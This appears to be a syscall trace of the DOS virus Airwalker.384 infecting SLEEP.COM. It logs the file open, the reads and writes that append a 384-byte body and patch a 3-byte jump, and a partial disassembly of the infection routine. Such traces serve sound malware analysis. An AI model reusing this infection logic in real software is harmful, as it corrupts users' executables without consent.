Time | Syscall Op | PC | Syscall Name |
---|---|---|---|
2018-12-17T22:48:16.179185461Z | 26 | PC: 12ab3 | Set disk transfer address |
2018-12-17T22:48:16.180289273Z | 78 | PC: 12abf | Find first file |
2018-12-17T22:48:16.187659298Z | 61 | PC: 12afe | Open file (Filename = 'SLEEP.COM') |
2018-12-17T22:48:16.195356603Z | 63 | PC: 12b0c | Read file or device (Read 3 bytes on handle 5) |
2018-12-17T22:48:16.202921812Z | 66 | PC: 12b1f | Move file pointer |
2018-12-17T22:48:16.205371333Z | 44 | PC: 12b2c | Get time<br>0x12b2c: xchg ch, cl<br>0x12b2e: add dx, cx<br>0x12b30: mov word ptr [bp + 0x170], dx<br>0x12b34: xor word ptr [bp + 0x15b], 0x1717<br>0x12b3a: xor byte ptr [bp + 0x15d], 0x19<br>0x12b3f: mov ah, 0x40<br>0x12b41: mov cx, 0x180<br>0x12b44: mov dx, bp<br>0x12b46: pushaw<br>0x12b47: jmp 0x12bf8<br>0x12b4a: pop ax<br>0x12b4b: jb 0x12b75<br>0x12b4d: sub ax, 3<br>0x12b50: push bx<br>0x12b51: mov bx, bp<br>0x12b53: mov word ptr cs:[bx + 1], ax<br>0x12b57: mov byte ptr [bx], 0xe9<br>0x12b5a: pop bx<br>0x12b5b: mov ax, 0x4200<br>0x12b5e: xor cx, cx |
2018-12-17T22:48:16.208055992Z | 64 | PC: 12bfe | Write file or device (Write 384 bytes on handle 5) |
2018-12-17T22:48:16.22202549Z | 66 | PC: 12b63 | Move file pointer |
2018-12-17T22:48:16.225266468Z | 64 | PC: 12b6f | Write file or device (Write 3 bytes on handle 5) |
2018-12-17T22:48:16.233188947Z | 62 | PC: 12b75 | Close file |
2018-12-17T22:48:16.24334931Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.384 virus! ') |